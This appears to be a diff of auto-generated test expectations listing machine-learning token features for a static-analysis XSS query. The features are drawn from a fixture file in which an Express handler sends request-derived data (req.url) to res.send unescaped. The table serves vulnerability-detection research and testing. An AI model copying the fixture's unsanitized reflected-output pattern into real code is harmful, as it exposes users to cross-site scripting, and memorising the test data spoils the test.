autogenerated/Xss/ReflectedXss/partial.js:14:10:14:10 | 3 | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:14:10:14:10 | 3 | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:14:10:14:10 | 3 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:14:10:14:10 | 3 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:14:10:14:10 | 3 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:14:10:14:10 | 3 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:14:13:14:19 | forEach | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:14:13:14:19 | forEach | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:14:13:14:19 | forEach | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:14:13:14:19 | forEach | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:14:13:14:19 | forEach | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:14:21:14:28 | callback | CalleeFlexibleAccessPath | ?.forEach | | autogenerated/Xss/ReflectedXss/partial.js:14:21:14:28 | callback | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:14:21:14:28 | callback | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | @@ -21611,6 +143920,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:14:21:14:28 | callback | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | | autogenerated/Xss/ReflectedXss/partial.js:14:21:14:28 | callback | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:14:21:14:28 | callback | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:17:1:17:3 | app | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:17:1:17:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:17:1:17:3 | app | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:17:1:17:7 | app.get | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:17:1:17:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:17:1:17:7 | app.get | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:17:1:24:2 | app.get ... ck);\\n}) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:17:1:24:2 | app.get ... ck);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:17:1:24:2 | app.get ... ck);\\n}) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:17:1:24:2 | exceptional return of app.get ... ck);\\n}) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:17:1:24:2 | exceptional return of app.get ... ck);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:17:1:24:2 | exceptional return of app.get ... ck);\\n}) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:17:5:17:7 | get | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:17:5:17:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:17:5:17:7 | get | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:17:9:17:21 | "/underscore" | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/partial.js:17:9:17:21 | "/underscore" | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:17:9:17:21 | "/underscore" | calleeImports | express | @@ -21618,6 +143942,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:17:9:17:21 | "/underscore" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/partial.js:17:9:17:21 | "/underscore" | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:17:9:17:21 | "/underscore" | receiverName | app | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:17:23 | underscore | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:17:23 | underscore | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:17:23 | underscore | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:17:23 | underscore | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:17:23 | underscore | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:17:24 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:17:24 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:17:24 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:17:24 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:17:24 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | 'arguments' object of anonymous function | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | (req, r ... ack);\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | (req, r ... ack);\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | (req, r ... ack);\\n} | calleeImports | express | @@ -21625,6 +143964,130 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | (req, r ... ack);\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | (req, r ... ack);\\n} | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | (req, r ... ack);\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | exceptional return of anonymous function | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | exceptional return of anonymous function | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | exceptional return of anonymous function | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | return of anonymous function | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | return of anonymous function | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:17:24:24:1 | return of anonymous function | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:17:25:17:27 | req | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:17:25:17:27 | req | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:17:25:17:27 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:17:25:17:27 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:17:25:17:27 | req | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:17:25:17:27 | req | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:17:25:17:27 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:17:25:17:27 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:17:25:17:27 | req | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:17:25:17:27 | req | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:17:30:17:32 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:17:30:17:32 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:17:30:17:32 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:17:30:17:32 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:17:30:17:32 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:17:30:17:32 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:17:30:17:32 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:17:30:17:32 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:17:30:17:32 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:17:30:17:32 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:17:30:17:32 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:17:30:17:32 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:17:30:17:32 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:18:2 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:18:2 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:18:2 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:18:2 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:18:2 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:18:2 | this | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:18:2 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:18:2 | this | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:18:2 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:18:2 | this | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | 'arguments' object of function sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | 'arguments' object of function sendResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | 'arguments' object of function sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | 'arguments' object of function sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | 'arguments' object of function sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | exceptional return of function sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | exceptional return of function sendResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | exceptional return of function sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | exceptional return of function sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | exceptional return of function sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | functio ... OK\\n } | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | functio ... OK\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | functio ... OK\\n } | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | functio ... OK\\n } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | functio ... OK\\n } | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | return of function sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | return of function sendResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | return of function sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | return of function sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:18:3:20:3 | return of function sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:18:12:18:23 | sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:18:12:18:23 | sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:18:12:18:23 | sendResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:18:12:18:23 | sendResponse | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:18:12:18:23 | sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:18:12:18:23 | sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:18:12:18:23 | sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:18:12:18:23 | sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:18:12:18:23 | sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:18:12:18:23 | sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:18:25:18:25 | x | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:18:25:18:25 | x | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:18:25:18:25 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:18:25:18:25 | x | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:18:25:18:25 | x | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:18:25:18:25 | x | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:18:25:18:25 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:18:25:18:25 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:18:25:18:25 | x | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:18:25:18:25 | x | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:18:28:18:28 | y | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:18:28:18:28 | y | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:18:28:18:28 | y | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:18:28:18:28 | y | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:18:28:18:28 | y | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:18:28:18:28 | y | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:18:28:18:28 | y | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:18:28:18:28 | y | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:18:28:18:28 | y | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:18:28:18:28 | y | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:7 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:7 | res | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:7 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:7 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:12 | res.send | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:12 | res.send | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:12 | res.send | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:12 | res.send | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:19 | exceptional return of res.send(x + y) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:19 | exceptional return of res.send(x + y) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:19 | exceptional return of res.send(x + y) | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:19 | exceptional return of res.send(x + y) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:19 | exceptional return of res.send(x + y) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:19 | res.send(x + y) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:19 | res.send(x + y) | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:19 | res.send(x + y) | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:19 | res.send(x + y) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:19:5:19:19 | res.send(x + y) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:19:9:19:12 | send | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:19:9:19:12 | send | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:19:9:19:12 | send | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:19:9:19:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:19:9:19:12 | send | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:19:14:19:14 | x | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:19:14:19:14 | x | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:19:14:19:14 | x | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:19:14:19:14 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:19:14:19:14 | x | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:19:14:19:14 | x | stringConcatenatedWith | -endpoint- y | | autogenerated/Xss/ReflectedXss/partial.js:19:14:19:18 | x + y | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/partial.js:19:14:19:18 | x + y | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:19:14:19:18 | x + y | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | @@ -21633,6 +144096,52 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:19:14:19:18 | x + y | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:19:14:19:18 | x + y | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:19:14:19:18 | x + y | receiverName | res | +| autogenerated/Xss/ReflectedXss/partial.js:19:18:19:18 | y | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:19:18:19:18 | y | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:19:18:19:18 | y | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:19:18:19:18 | y | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:19:18:19:18 | y | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:19:18:19:18 | y | stringConcatenatedWith | x -endpoint- | +| autogenerated/Xss/ReflectedXss/partial.js:22:7:22:14 | callback | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:22:7:22:14 | callback | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:22:7:22:14 | callback | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:22:7:22:14 | callback | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:22:7:22:14 | callback | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:22:7:22:58 | callbac ... eq.url) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:22:7:22:58 | callbac ... eq.url) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:22:7:22:58 | callbac ... eq.url) | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:22:7:22:58 | callbac ... eq.url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:22:7:22:58 | callbac ... eq.url) | fileImports | express lodash ramda underscore | +| 